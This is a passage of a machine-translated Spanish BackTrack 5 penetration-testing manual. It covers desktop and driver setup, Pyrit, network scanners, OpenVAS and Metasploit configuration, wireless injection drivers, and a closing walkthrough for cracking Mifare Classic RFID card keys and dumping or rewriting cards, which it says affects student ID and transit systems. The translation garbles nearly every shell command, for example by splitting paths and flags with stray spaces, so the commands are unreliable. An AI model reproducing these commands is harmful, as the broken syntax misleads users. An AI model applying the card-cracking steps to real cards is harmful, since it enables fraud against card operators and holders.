• Una vez que el guión está terminado se le presentará con un mensaje que le indica que debe iniciar su Fluxbox.

• Sin embargo antes de que reinicie hay una cosa que tenemos que hacer, vamos a tener que hacer saber a ejecutar BackTrack FluxBox sobre el comando startx y no es por defecto WM.

root @ bt:. ~ # echo exec / usr / bin / startfluxbox> ~ / xinitrc root @ bt: ~ # shutdown-r 0

• Reinicie el BackTrack y FluxBox enjoy!

NOTA: Para volver a la configuración predeterminada WM todo lo que tienes que hacer es eliminar el archivo xinitrc..

root @ bt:. ~ # rm-rf ~ / xinitrc root @ bt: ~ # shutdown-r 0

Instale Flash Player

Page 26: Manual Backtrack

Instale Flash Player • Como te habrás dado cuenta de Flash Player no funciona en Backtrack 5, por lo que para

solucionar este problema, primero tenemos que quitar el reproductor de flash actual emitiendo los siguientes comandos:

root @ bt: ~ # apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla root @ bt: ~ # rm-f / usr / lib / firefox / plugins / * flash * root @ bt: ~ # rm-f / usr / lib / firefox addons-/ plugins / * flash * root @ bt: ~ # rm-f / usr / lib / mozilla / plugins / * flash * root @ bt: ~ # rm-f ~ / .mozilla / plugins / * flash * so root @ bt: ~ # rm-rfd / usr / lib / nspluginwrapper

• Después de quitar flash que necesita para obtener el reproductor de flash de nuevo el oficial [ http://www.adobe.com/software/flash/about/ sitio web]. (Descargar en formato tar.gz)

• Lo siguiente que se hará cargo del reproductor de Flash:

root @ bt: ~ # mkdir-p ~ / .mozilla / plugins root @ bt: ~ # mkdir Flash root @ bt: ~ # mv-f install_flash_player_11_linux.i386.tar.gz flash / root @ bt: ~ # cd flash / root @ bt: ~ / flash # tar install_flash_player_11_linux.i386.tar.gz xvfz root @ bt: ~ / flash # cp-f libflashplayer.so ~ / .mozilla / plugins /

• Podemos probar si funciona Flash Player aquí .

ADVERTENCIA: Asegúrese de configurar correctamente o NOSCRIPT TUS VIDEOS FLASH NO FUNCIONA!

Instale OpenCL

Instale OpenCL en Backtrack Este artículo fue contribuido por g0tmi1k.

• Twitter: ! https://twitter.com/ # / g0tmi1k

• En esta guía vamos a instalar y configurar OpenCL en Backtrack.

NOTA: Es posible que tenga que hacer algunos ajustes menores en función de su sistema.

Page 27: Manual Backtrack

Empecemos:

• En primer lugar antes de empezar queremos asegurarnos de que nuestro sistema está actualizado.

root @ bt: ~ # apt-get update && apt-get upgrade

• Antes de continuar con la instalación de los controladores de ATI que necesitamos para que nuestro código fuente del kernel preparado.

root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /

• Ahora que estamos preparados es el momento de descargar los drivers de ATI.

root @ bt: ~ # wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-9-x86.x86_64.run root @ bt: ~ # chmod + x ati-driver-installer-11-9-x86.x86_64.run root @ bt: ~ # ./ati-driver-installer-11-9-x86.x86_64.run root @ bt: ~ # reboot

• Antes de que termine hay una cosa más que tenemos que instalar, el AMD Accelerated Parallel Processing (APP) SDK, éste debe ser instalado de acuerdo con la arquitectura de CPU.

Para la arquitectura de 32 bits:

root @ bt: ~ # wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx32.tgz root @ bt: ~ # tar-xvzf AMD-APP-SDK-v2.5-lnx32.tgz root @ bt:. ~ # / Install-AMD-APP.sh

Para la arquitectura de 64 bits:

root @ bt: ~ # wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx64.tgz root @ bt: ~ # tar-xvzf AMD-APP-SDK-v2.5-lnx64.tgz root @ bt:. ~ # / Install-AMD-APP.sh

• También necesitaremos cmake y cmake + + junto con algunos archivos de la biblioteca.

En primer lugar, instalar las bibliotecas y cmake:

root @ bt: ~ # apt-get install libroot-python-dev libboost-python-dev zlib1g-dev libssl-dev cmake libboost1.40-all-dev

Antes de poder instalar cmake + + tenemos que establecer las rutas de ATI Stream:

root @ bt: ~ # echo "ATISTREAMSDKROOT = / opt / AMDAPP root @ bt:. ~ # export ATISTREAMSDKROOT ">> ~ / bashrc root @ bt:. ~ # source ~ / bashrc

Ahora podemos proceder con la instalación:

root @ bt: ~ # svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp root @ bt: ~ # cd calpp / trunk root @ bt: ~ # cmake.

Page 28: Manual Backtrack

root @ bt: ~ # make root @ bt: ~ # make install

• Además ahora podemos instalar Pyrit con la opción OpenCL.

root @ bt: ~ # svn checkout http://pyrit.googlecode.com/svn/trunk/ / tmp / root @ bt Pyrit: ~ # cd / tmp / Pyrit / Pyrit && python setup.py construir && python setup.py install root @ bt: ~ # cd / tmp / Pyrit / && cpyrit_opencl python setup.py construir && python setup.py install

• Ahora podemos probar Pyrit.

root @ bt: ~ # Pyrit list_cores root @ bt: ~ # Pyrit punto de referencia

Recopilación de información

Autoscan - Unicornscan

Autoscan

Configuración de escaneo automático en Backtrack 5 ¿Cuál es Autoscan?

En Autoscan corto es una red de descubrimiento y gestión de aplicaciones. Su propósito principal es identificar rápidamente las máquinas conectadas / equipo en un entorno de red.

Page 29: Manual Backtrack

• Vamos a configurar rápidamente autoscan en Backtrack5, puede encontrarlo mediante el menú en:

BackTrack -> Recopilación de Información -> Análisis de Red -> Red Scanners -> autoscan

• Tan pronto como iniciarlo desde el menú comenzaremos nuestro asistente de configuración, haga clic en Siguiente para continuar:

• Ahora vamos a configurar una nueva red y añadir nuestros propios datos haciendo clic en el botón Añadir:

• Seleccione la interfaz de red (wlan0 en este caso):

• Después de que se nos pide para confirmar nuestros valores:

• Aquí hay alguna salida similar a lo que se ve en algunos dispositivos:

Unicornscan

Unicornscan es un impresionante "remitente carga útil", que también puede actuar como un escáner asíncrona. Gracias a dash1b y su guión impresionante parche en marcha, hemos sido capaces de implementar rápidamente las características completas del escáner en BackTrack 5. Para instalar unicornscan en BackTrack 5 (si no está ya instalado), escriba:

Page 30: Manual Backtrack

root @ bt: ~ # apt-get update root @ bt: ~ # apt-get install unicornscan

A continuación, ejecute la secuencia de comandos de configuración de postgres, que fue tomada en su mayoría de http://code.google.com/p/unicornscan-bt5-install-script/ . Este script configurar el servidor PostgreSQL Framework3 como la base de datos back-end para Unicornscan.

Iniciar apache, y vaya a http://127.0.0.1/unicornscan . Iniciar una exploración utilizando la opción-epgsqldb.

• Página • Casa • Foros • Blog • Formación • Descargas • Sobre

• Introducción> • Kernel> • Personalización> • Recopilación de información> • Vulnerabilidad Identificación> • Explotación> • Radio Network Analysis> • Privilege Escalation> • Telefonía> • Forense> • Errores conocidos BackTrack • Preguntas más frecuentes

Caja de herramientas

• Lo que enlaza aquí • Seguimiento de enlaces • Páginas especiales • Versión para imprimir • Enlace permanente

Page 32: Manual Backtrack

Contenido [hide]

• 1 Instalación de OpenVAS

• 2 Ubicación de las entradas del menú OpenVAS

• 3 OpenVAS comprobar la configuración

• 4 Configuración de OpenVAS

• 4.1 Paso 1. Añadir un usuario

• 4,2 Paso 2. Hacer el Certificado

• 4.3 Paso 3. La sincronización

Page 33: Manual Backtrack

Instalación OpenVAS La forma más sencilla de instalar todos los componentes necesarios de la suite openvas es emitir los mandatos siguientes en una ventana de terminal.

root @ bt: ~ # apt-get update root @ bt: ~ # apt-get install openvas

Los openvas paquete es un "maestro" paquete que contiene toda la información necesaria para descargar automáticamente todos los paquetes que componen la suite completa de herramientas de openvas.

Ubicación de las entradas del menú OpenVAS Una vez que se ha instalado openvas usted encontrará todo el de las entradas de menú en esta localidad.

OpenVAS comprobar la configuración openvas-check-setup es una herramienta muy útil, aquí se muestra cómo se puede ayudar a diagnosticar problemas y dar consejos sobre cómo solucionarlos.

Configuración de OpenVAS

Paso 1. Añadir un usuario

En el menú, seleccione OpenVAS Adduser y siga las instrucciones.

Tenga en cuenta que puede utilizar cualquier nombre de usuario que quiera, pero en este caso he usado la raíz. Lo he dejado en el valor predeterminado de autenticación de contraseña como voy a usar esto en una máquina local y para evitar tener que preocuparse acerca de los usuarios que tienen certs de qué preocuparse, pero esto es totalmente de usted. No se puede tener una contraseña vacía, así que he utilizado Toor en este caso. Para las reglas que se aplican a este usuario he dejado en blanco presionando ctrl-d Esto significa que este usuario será capaz de realizar cualquier tarea sin ningún tipo de restricciones.

Paso 2. Hacer el Certificado

En el menú, seleccione OpenVAS mkcert y siga las instrucciones.

Aquí vamos a crear el certificado SSL Esto se utiliza si usted decide utilizar cert lugar de paso al crear el usuario, pero están obligados a crear todos modos, incluso si usted decide no utilizar certs.

Paso 3. La sincronización de la NVT

En este punto tenemos que conseguir la última serie de NVT. Estos son los que el analizador usa para detectar las vulnerabilidades en lo que va a escanear. Por favor, tenga en cuenta que tendrá que hacer esto con bastante regularidad, y la primera vez que haces podría tardar un tiempo dependiendo de la velocidad de su ordenador y de Internet.

Así que seleccione OpenVAS NVT Sync en el menú

Page 34: Manual Backtrack

Paso 4. Puesta en marcha del escáner

Comience escáner OpenVAS

Ahora estamos listos para iniciar el escáner

Esto tomará un tiempo la primera vez que lo inicie como lo comprueba y carga el nuevo NVT ha descargado en el paso anterior.

Tenga en cuenta el tiempo en la esquina! Esto fue en una máquina virtual de lo que debe ser mucho más rápido para usted.

Arranques posteriores será rápido a menos que no haya actualizado en bastante tiempo

Por favor, recuerde que el escáner se ejecuta como un demonio en el fondo y seguirá funcionando hasta que se reinicie o pararlo con la entrada de menú proporciona.

Paso 5. Configuración OpenVAS gerente

Configuración de administrador openvas

Lo primero que tenemos que hacer es hacer un certificado de cliente para el gestor de OpenVAS, Esto se hace ejecutando el siguiente comando

openvas-mkcert-client-n om-i

ahora tenemos que reconstruir la base de datos, ya que ahora está fuera de fecha con el agregado de nvt y que de otra manera sería obtener errores sobre la base de datos. Usted debe hacer esto cada vez que actualice el de NVT. Esto se hace con un simple comando

openvasmd - rebuild

Este proceso sólo tomará unos segundos si se utiliza OpenVAS bibliotecas de la versión 4.0.3 o inferior.

Este proceso puede tomar mucho más tiempo si se utiliza OpenVAS bibliotecas de la versión 4.0.5 o superior. La desventaja de este tiempo extra es mucho mayor capacidad de exploración, por lo que vale la pena.

Paso 6. Configuración OpenVAS Administrador

Configuración de Administrador OpenVAS

Tenemos que crear un usuario administrativo que vamos a utilizar para realizar todas evaluación contemplaba nuestra vulnerabilidad. Esto se hace ejecutando el siguiente comando

openvasad-c 'add_user'-n-r openvasadmin administración

openvasadmin es el nombre que he elegido para convertirse en el usuario, sin embargo, puede sustituir eso con algo más adecuado para usted si así lo desea. Asegúrese de que puede recordar este nombre de usuario y la contraseña asociada, ya que lo necesitará cuando ejecute openvas.

root @ bt: ~ # openvasad-c 'add_user'-n-r openvasadmin administración Palabra clave: anuncio principal: MENSAJE :5871:2011-05-26 04h57.08 BST: No hay reglas expediente previsto, el

Page 35: Manual Backtrack

nuevo usuario no tendrá restricciones. anuncio principal: MENSAJE :5871:2011-05-26 04h57.08 BST: openvasadmin usuario se ha creado correctamente. root @ bt: ~ #

Iniciar el Administrador OpenVAS Ahora tenemos que iniciar el Administrador de OpenVAS

Se ejecuta como un daemon en segundo plano. Como estoy corriendo desde mi máquina local que va a utilizar para escuchar en localhost y, en este caso, el puerto por defecto. Esto se hace mediante la ejecución del siguiente comando.

openvasmd-p 9390-un 127.0.0.1

A partir Administrador OpenVAS Ahora tenemos que iniciar el Administrador de OpenVAS

Esto también se ejecuta como un demonio en segundo plano. Como estoy corriendo desde mi máquina local que va a utilizar para escuchar en localhost y, en este caso, el puerto por defecto. Esto se hace mediante la ejecución del siguiente comando.

openvasad-a 9.393 127.0.0.1-p

A partir Greenbone Asistente de seguridad Ahora tenemos que empezar a Greenbone Asistente de seguridad

De nuevo, esto se ejecuta como un demonio en segundo plano. Como estoy corriendo desde mi máquina local que va a utilizar para escuchar en localhost y, en este caso, el puerto por defecto. Esto se hace mediante la ejecución del siguiente comando.

GSAD - http-only - listen = 127.0.0.1-p 9392

Más información sobre estos comandos y otras opciones se pueden encontrar mediante la ejecución de su entrada en el menú asociado y mirando las páginas de manual. Como los tres de estos análisis como un demonio y seguirá funcionando hasta que se cierre su computadora, me han proporcionado las entradas de menú para usted de modo que usted puede detenerlos cuando ya no los necesite.

En este punto de la instalación es prácticamente completa, pero como hemos llegado hasta aquí bien podemos seguir para asegurarse de que todo está funcionando como se esperaba.

OpenVAS interfaces de usuario

Greenbone seguridad de escritorio

Ahora tenemos que iniciar una aplicación para que pueda comunicarse con el escáner y otros demonios.

La primera de estas opciones es Greenbone seguridad de escritorio

Page 36: Manual Backtrack

Inicie esto desde la opción de menú y rellenar las credenciales y los detalles que hemos creado anteriormente, a continuación, haga clic en el botón de inicio de sesión.

Una vez conectado usted puede utilizar esto como su interfaz de exploración, o utilizar la opción siguiente de que usted prefiera.

Interfaz web

El siguiente método es a través de una interfaz web

Abra su navegador favorito y escriba la siguiente dirección

127.0.0.1:9392

A continuación se le presentará una página de inicio de sesión. iniciar sesión con las credenciales que hemos creado antes.

Una vez que haya iniciado la sesión, se dará cuenta de que su uso de la CPU se golpeó el techo, no se preocupe, este volverá a la normalidad en poco tiempo.

Aquí puede realizar y configurar todas las tareas de escaneo. Es una buena idea establecer NoScript para permitir temporalmente 127.0.0.1 o puede obtener resultados inesperados.

Hay mucho más para OpenVAS que he incluido aquí, pero esto es sólo la intención de poner en marcha rápidamente. Analiza y configuraciones más avanzadas están más allá del alcance de este tutorial simple. No se olvide de algunas de las otras partes a openvas contenidos en el menú que no he tratado aquí y también las páginas de manual.

Una vez que haya completado el proceso de configuración

OpenVAS que comienzan con Greenbone de seguridad de escritorio como la interfaz de análisis

En el menú, seleccione

OpenVAS NVT sincronización

Comience escáner OpenVAS

a continuación, en una ventana de terminal

openvasmd - rebuild openvasmd-p 9390-un 127.0.0.1 openvasad-a 9.393 127.0.0.1-p GSAD - http-only - listen = 127.0.0.1-p 9392

Luego, desde el menú

Comience Greenbone seguridad de escritorio

y login

Ahora está listo para configurar tareas de exploración.

Page 37: Manual Backtrack

OpenVAS A partir de un navegador web como interfaz de escaneo

En el menú, seleccione

OpenVAS NVT sincronización

Comience escáner OpenVAS

a continuación, en una ventana de terminal

openvasmd - rebuild openvasmd-p 9390-un 127.0.0.1 openvasad-a 9.393 127.0.0.1-p GSAD - http-only - listen = 127.0.0.1-p 9392

A continuación, abra su navegador a la dirección

http://127.0.0.1:9392

Login.

Ahora está listo para configurar tareas de exploración.

Metasploit Framework MySQL

Metasploit Framework con soporte MySQL

Con una reciente corrección de errores, hemos simplificado los pasos necesarios para utilizar MySQL como back-end para el Metasploit Framework.

root @ bt: ~ # apt-get update root @ bt: ~ # apt-get dist-upgrade root @ bt: ~ # mysql servicio de inicio root @ bt: ~ # msfconsole

Un comando db_driver debe mostrar la disponibilidad de la opción de MySQL:

msf> db_driver [*] Driver activo: postgresql [*] Disponible en: postgresql, mysql

msf>

Vaya por delante y conectarse a la base de datos utilizando la contraseña de root por defecto de MySQL Toor:

msf> db_driver mysql [*] El uso de bases de datos mysql conductor msf> root db_connect: [email protected] / msf3 msf>

Page 38: Manual Backtrack

Radio Network Analysis

Wireless Drivers

Wireless Drivers

Con el escenario siempre cambiante del mundo del controlador inalámbrico y el mac80211 pila, hemos querido dedicar una página que resolver algunas configuraciones complicadas inalámbricos controladores. Antes de iniciar su viaje hacia BackTrack mundo inalámbrico, primero debe identificar el chipset de la tarjeta inalámbrica con un 100% de certeza. En caso de duda, usted siempre se puede intentar de enchufar el tarjeta en una casilla de Linux, y ver lo que dmesg tiene que decir.

Page 39: Manual Backtrack

Contenido [hide]

• 1 BackTrack 5 r2

• 1.1 b43

• 2 BackTrack 5 r1

• 2,1 rt2800usb

• 3 BackTrack 5

• 3.1 Wireless Drivers

•3

•3

• 3.2 Tarjetas inalámbricas

•3

•3

•3

Page 40: Manual Backtrack

BackTrack 5 r2 BackTrack 5 R2 contiene imágenes del kernel parcheado 3.2.6 controladores inalámbricos con varios parches de inyección aplicados.

b43 BackTrack 5 R2 ha pasado de b43 conductores a los conductores brcmsmac. Si necesitas habilitar los b43 controladores, siga esta guía - http://www.backtrack-linux.org/wiki/index.php?title=Enable_b43_drivers_in_Backtrack5_r2 .

BackTrack 5 r1 BackTrack 5 R1 contiene parches del kernel 2.6.39.4 del stock controladores inalámbricos con varios parches de inyección aplicados. Dependiendo de la tarjeta y la configuración, estos controladores no le conviene.

rt2800usb En algunos casos hemos visto las tarjetas que utilizan los controladores rt2800usb (como el AWUS036NH y Alfàs AWUS036NEH) actuar extraño con el kernel BT5R1. Si esto le sucede a usted, usted puede intentar instalar un reciente compat-wireless y construir por su cuenta. Esta versión específica funcionará:

root @ bt: ~ # ln-s / usr / src / linux / lib/modules/2.6.39.4/build root @ bt: ~ # cd / usr / src /

root @ bt: ~ # tar jxpf compat-wireless-2011-07-14.tar.bz2 root @ bt: ~ # wget http://www.backtrack-linux.org/2.6.39.patches.tar root @ bt: ~ # tar xpf 2.6.39.patches.tar root @ bt: ~ # cd compat-wireless-2011-07-14 root @ bt: ~ # patch-p1 <.. / patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch root @ bt: ~ # patch-p1 <.. / patches/mac80211.compat08082009.wl_frag + ack_v1.patch root @ bt: ~ # patch-p1 <.. / patches/zd1211rw-2.6.28.patch root @ bt: ~ # patch-p1 <.. / patches/ipw2200-inject.2.6.36.patch root @ bt: ~ # make root @ bt: ~ # make install root @ bt: ~ # reboot

BackTrack 5 BackTrack 5 contiene imágenes del kernel 2.6.38 parcheado controladores inalámbricos, así como varios conductores "externos". Algunos de estos controladores se solapan, para proporcionar una flexibilidad máxima con varios ataques inalámbricos. El archivo / etc / modprobe.d / blacklist dicta que los conductores preferidos se cargan al arrancar el sistema. En términos generales, todos los conductores de edad avanzada IEEE están en listas negras y tienen que cargarse manualmente si quieres usarlos.

Page 41: Manual Backtrack

Wireless Drivers

rtl8187 vs r8187

Esto es confuso. El rtl8187 es el conductor de pila mac80211, mientras que el r8187 es el antiguo controlador IEEE. Tanto el apoyo de la inyección. Los más nuevos mac80211 RTL8187 conductores parecen tener un desagradable error en VMWare. Para obtener más información acerca de estos controladores visite nuestro rtl8187 vs r8187 página.

compat wireless

Como Linux controladores inalámbricos maduro, más chipsets se añaden a la lista de compatibilidad. Si ninguno de los controladores del núcleo nativo BackTrack trabajar para usted, es posible que desee considerar el uso de una versión más reciente de compat-wireless. Echa un vistazo a la compat-wireless página para obtener información sobre cómo obtener los drivers y funcionando.

Tarjetas inalámbricas ESTA LISTA DEBE SER ACTUALIZADO PARA BT5.

Tarjetas Probado y de trabajo

Hemos sido capaces de poner a prueba las siguientes tarjetas. Tenga en cuenta que "pasó" significa "pasar un aireplay -9" prueba de inyección. Estaremos ampliando esta lista a medida que más cúpulas de retroalimentación forman la comunidad. De nuestras pruebas hemos encontrado que los conjuntos de chips más importantes fueron apoyados, así como las tarjetas más comunes.

• AWUS036H (rtl8187, r8187) - ambos pilotos mac80211 y IEEE - aprobada • AWUS036NH (Ralink RT2870/3070) - usando los drivers mac80211 rt2x00usb - aprobada • BCM4312 802.11b / g LP-PHY (rev 01) - usando el mac80211 b43, funciona bien - aprobó • N3 Rockland - (Ralink RT2870/3070) - usando los drivers mac80211 rt2x00usb - aprobada • Edimax EW-7318USg USB - (Ralink RT2501/RT2573) - usando los drivers mac80211

rt2500usb/rt73usb - aprobada • Asustek Computer, Inc. RT2573 - usando los drivers mac80211 rt2500usb/rt73usb - aprobada • Linksys WUSB54GC ver 3 - utilizando los drivers mac80211 rt2800usb - aprobada • Ubiquiti SRC - usando el ath9k mac80211 conductores de paso obligatorio • Interna Intel Corporation PRO / Wireless 3945ABG - usando el iwl3945 mac80211 conductores

de paso obligatorio • Dlink WNA-2330 PCMCIA - usando el ath5k mac80211 conductores de paso obligatorio • Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) -

usando el ath9k mac80211 conductores de paso obligatorio • Netgear WG111v2 - usando el rtl8187 mac80211 conductores de paso obligatorio • ZyXEL AG-225H v2 - utilizando los drivers mac80211 ZD1211 - aprobada • Intel 4956/5xxx - utilizando los controladores iwlagn - aprobada

Page 42: Manual Backtrack

Trabajo, sin inyección

• Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03) • Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01)

NO tarjetas de trabajo

• D-Link DWL-122 - utilizando los drivers mac80211 prism2_usb - fail • Linksys WUSB600N v2 - utilizando los drivers mac80211 rt2800usb - fail • AWUS051NH - fail

RFID Mifare Classic Cocinando con

Este artículo fue contribuido por MI1.

• URL: http://hack4fun.eu • Twitter: ! http://twitter.com/ # / mi1c00k • Email: [email protected]

Page 43: Manual Backtrack

Contenido [hide]

• 1 RFID Mifare Classic Cocinando con

• 2 0x00 - Prefacio

• 2.1 Dependencias

• 3 0x01 - Hardware

• 3,1 touchatag - ACR122U

• 4 0x02 - Software

• 4,1 ACR122U conductor

• 4,2 de código abierto Near Field Comm

Page 44: Manual Backtrack

RFID Mifare Classic Cocinando con

DESCARGO DE RESPONSABILIDAD: La información y la implementación de referencia se proporciona:

• Para fines informativos únicamente como parte de estudios académicos o de investigación, especialmente en el campo de la seguridad de información, criptografía y sistemas de seguridad

• Tal cual, sin ningún tipo de garantía, el apoyo o la responsabilidad - de los daños o consecuencias obtenidas como resultado de la consulta de esta información si puramente del lado del lector

• NO deben utilizarse en circunstancias ilegales (por ejemplo, para abusos, hack o truco de un sistema que el lector no tiene autorización específica a como los sistemas de venta de entradas, transporte público, tarjetas de Universidad / CIIU, la construcción de sistemas de acceso o sistemas que utilizan ningún tipo Mifare Classic como La tecnología de núcleo)

NOTAS:

• Este artículo contiene ninguna investigación original. Toda la investigación y la aplicación fue hecha por otras personas y las comunidades, y está disponible al público. Hicimos esto dos centavos por diversión y porque amamos BackTrack.

• Esto no es una guía AZ fin de tratar más duro!

0x00 - Prólogo Algunos de ustedes pueden haber leído que el propio algoritmo simétrico de claves criptográficas de la tarjeta MIFARE Classic se ha roto. La tarjeta MIFARE Classic se utiliza en los sistemas de control de acceso físico (PACS) y los sistemas de pago sin contacto (incluyendo peaje y sistemas de transporte público). Según algunas estimaciones, hay 500 millones de tarjetas MIFARE desplegados en todo el mundo, y la mayoría de ellos son las tarjetas MIFARE Classic.

Mifare Classic es un bajo costo, de nivel de entrada chip, basado en la norma ISO / IEC 14443 Tipo A, 1kB o 4KB. Utiliza el estándar de 13,56 Mhz tarjeta inteligente sin contacto, CRYPTO1 propietario con 48 teclas bits. No hay protección contra la clonación o modificaciones. Cualquier persona con 50 € lector puede usar esta debilidad contra su infraestructura. Al menos un sector siempre se cifra con la clave por defecto. Después de agrietamiento todas las claves, los hackers son capaces de cambiar el nombre, número de estudiantes universitarios, la fecha de caducidad ... Este libro de cocina es una prueba de concepto de lo fácil que se puede hacer. Ingredientes elegidos: Backtrack | touchatag paquete inicial Probado en: BackTrack 4 R2, BackTrack 5 Final, (32 bits)

Page 45: Manual Backtrack

Dependencias root @ bt: ~ # apt-get install flex libpcsclite-dev libusb-dev checkinstall

0x01 - Hardware

Touchatag - ACR122U

Touchatag es ACS ACR122 (U) NFC lector RFID USB Reader. El lector USB funciona a 13,56 MHz (alta frecuencia RFID) y tiene una distancia de lectura de aproximadamente 4 cm (1 pulgada) cuando se utiliza con las etiquetas RFID touchatag. Este producto está fabricado por Advanced Card Systems Limited y parece estar disponible en diferentes configuraciones de hardware, pero no difiere mucho. Todos ellos están usando un chip NFC PN532 Controller y una unidad ST7 microcontrolador.

0x02 - Software

ACR122U conductor root @ bt: ~ # wget http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip root @ bt: ~ # unzip-d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip root @ bt: ~ # cd acr122u root @ bt: ~ # tar-jxvf acsccid-1.0.2.tar.bz2 root @ bt: ~ # cd acsccid-1.0.2 root @ bt:. ~ # / configure root @ bt: ~ # make root @ bt: ~ # checkinstall-D-y - instalar

Open Source Near Field Communication (NFC) Library / LIBNFC /

Libnfc es la primera libre SDK y API NFC Programadores publicado bajo la licencia GNU Lesser General Public.

root @ bt: ~ # apt-get install-y debhelper && libtool wget http://libnfc.googlecode.com/files/libnfc-1.4.2.tar.gz root @ bt: ~ # tar xfvz libnfc-1.4.2 tar.gz. && cd libnfc-1.4.2 root @ bt: ~ # svn checkout http://libnfc.googlecode.com/svn/tags/libnfc-1.4.2/debian root @ bt: ~ # dpkg-buildpackage-rfakeroot root @ bt:. ~ # dpkg-i .. / libnfc * deb

Revise su lector / target con nfc-list.

root @ bt: ~ # nfc-list nfc-list uso libnfc 1.4.2 (r891) Conectado al dispositivo NFC: ACS ACR122U 00 00 / ACR122U103 - PN532 v1.6 (0x07) 1 ISO14443A objetivo pasiva (s) fue encontrado: ATQA (SENS_RES): 00 02 UID (NFCID1): xx xx xx xx SAK (SEL_RES): 18

Si el lector es rechazada por el firmware (mensaje de registro: "Firmware (xy) es falso") acaba de desactivar la comprobación de versión. Todo lo que necesitas hacer es cambiar ifdDriverOptions (línea 55 en Info.plist) para omitir la comprobación de versión de esta manera:

Page 46: Manual Backtrack

root @ bt: ~ # nano / usr / lib / pcsc / drivers / IFD-ccid.bundle / Contenidos / Info.plist ifdDriverOptions 0 × 0005

A continuación, reinicie el demonio pcscd y su lector touchatag deben ser reconocidos y listo.

MFOC-Mifare Classic Cracker Desconectado

Mifare Classic Desconectado Cracker es una herramienta que puede recuperar claves de tarjetas Mifare Classic. Gracias a Norbert Szetei y Luptak Pavol para la implementación de su ataque. MFOC es utilidad para calcular (crack) todas las teclas (A y B) para todos los sectores, proporcionando al menos una de las claves que ya se conoce. Archivo de claves es el archivo donde se almacenará mfoc teclas rotas. Formato de archivo que sea compatible con la tecnología NFC mfclassic, así que usted puede utilizar para deshacerse de la tarjeta en un archivo o escribir un volcado en la tarjeta.

root @ bt: ~ # wget http://nfc-tools.googlecode.com/files/mfoc-0.10.2.tar.gz && tar-xvzf mfoc-0.10.2.tar.gz root @ bt: ~ # cd mfoc-0.10.2 root @ bt: ~ # autoreconf-vis root @ bt:. ~ # / configure root @ bt: ~ # make root @ bt: ~ # checkinstall-D-y - instalar

0x03 - Dumping y Cocina psscd coordina la carga de los drivers para lectores de tarjetas. Permite a las aplicaciones acceder a tarjetas inteligentes y lectores sin conocer los detalles de la tarjeta o el lector. Es un gestor de recursos que coordina las comunicaciones con lectores de tarjetas inteligentes y las tarjetas inteligentes y tokens criptográficos que están conectadas al sistema. Yo prefiero empezar pcscd en primer plano (sin demonio) con pcscd-f. Entonces es el momento de empezar a mfoc. Usar número elevado de sondas, porque el número predeterminado de sondas para una clave de recuperación para un sector es 20. Craqueo enteras podrían tardar de 30 minutos a 30 horas.

También puede utilizar el parámetro-k clave, para agregar una clave a la lista de claves conocidas, que está siendo juzgado en contra de su tarjeta en la fase inicial. La opción-k de alguna manera no me funcionó, así que siempre compilar mis claves conocidas directamente en Buscar mfoc.c "Matriz de teclas por defecto Mifare Classic" No estoy seguro acerca de otros países, pero en el país donde vivo teclas son las mismas . Una vez que tenga las llaves de todos los sectores, debe ser capaz de utilizar RFID-Fu contra otras tarjetas, lo cual es epic fail.

root @ bt: ~ # nfc-mfclassic - ayuda Uso: nfc-mfclassic r | wa | b <dump.mfd> [<keys.mfd>]

Page 47: Manual Backtrack

r | w - Realizar leer (r) o escribir (w) tarjeta A | B - Utilice las teclas A o B para la acción <dump.mfd> - Dump MiFare (MFD) que se utiliza para escribir (tarjeta de MFD) o (MFD a la tarjeta) <keys.mfd> - MiFare Dump (MFD) que contienen las teclas (opcional) O bien: nfc-mfclassic x <dump.mfd> <payload.bin> x - Extracto de carga útil (bloques de datos) de MFD <dump.mfd> - MiFare Dump (MFD) que contiene la carga útil quería <payload.bin> - Binary carga de archivos donde se extraerán

Tenga en cuenta que los UID de la tarjeta no se verá afectada (no cambia) con este proceso. Compre algunas tarjetas en blanco o III Proxmark si eso es lo que quieres. Si usted está pensando ahora vertido su monedero electrónico inmediatamente después de la recarga y cuando el crédito llega a cero, escribir el contenido de nuevo, por favor, no lo hagas. ¿Qué se puede dejar de hacer eso? Bueno, probablemente sólo su conciencia, pero si la tarjeta se bloquea en 24 horas después del primer uso y luego no te quejes. Sí, hay control en línea y facturación de los sistemas que hay para tarjetas básicas.

0x04 - ISIC Issue Con ISIC-International Student Identity Card atacante puede abusar de las diez de servicio no sólo uno. Tarjetas ISIC son ampliamente utilizados para el transporte de entrada, comedor, pagos y servicios varios otros o descuentos. De acuerdo a la página principal hay 4,5 millones de tarjetahabientes en 120 países. Las tarjetas deben ser sustituidas por otras más seguras tipos ASAP. Se puede hacer mucho más que eso, pero suficiente para la demostración vamos a jugar un poco ...

En algunas universidades, sólo hay un control de seguridad de la entrada - ISIC. Como se puede ver que esto es trivial que quiere evitar. Hicimos muchas pruebas con los sistemas de transporte público y con los sistemas universitarios. Los resultados son todos iguales - esos sistemas son fáciles de piratear.

0x06 - Conclusión Por último, ¿cuándo la gente a aprender la lección? Los algoritmos criptográficos deben ser públicos para que puedan ser analizado y probado. Algoritmos secretos no son más valiosos porque son secretos. Cualquier persona que necesite una tarjeta inteligente alta seguridad debe asegurarse de que hay seguridad en capas y no sólo depende de la encriptación del chip.

0x07 - ¿Qué será lo próximo? • Desde que tengo acceso a Proxmark III, que es universal herramienta de hacking RFID que puede

ser utilizado por el 100% de clonación precisa (incluso UID), i una vez puede escribir acerca de la segunda edición c00king con Mifare Classic y Prox HID ...

• Armado con BackTrack GSM ataque suite?

0x08 - Gracias Este libro de cocina fue hecha con gran ayuda de los chicos h4f, muchas gracias a Vulcano y Atrás.

Page 48: Manual Backtrack

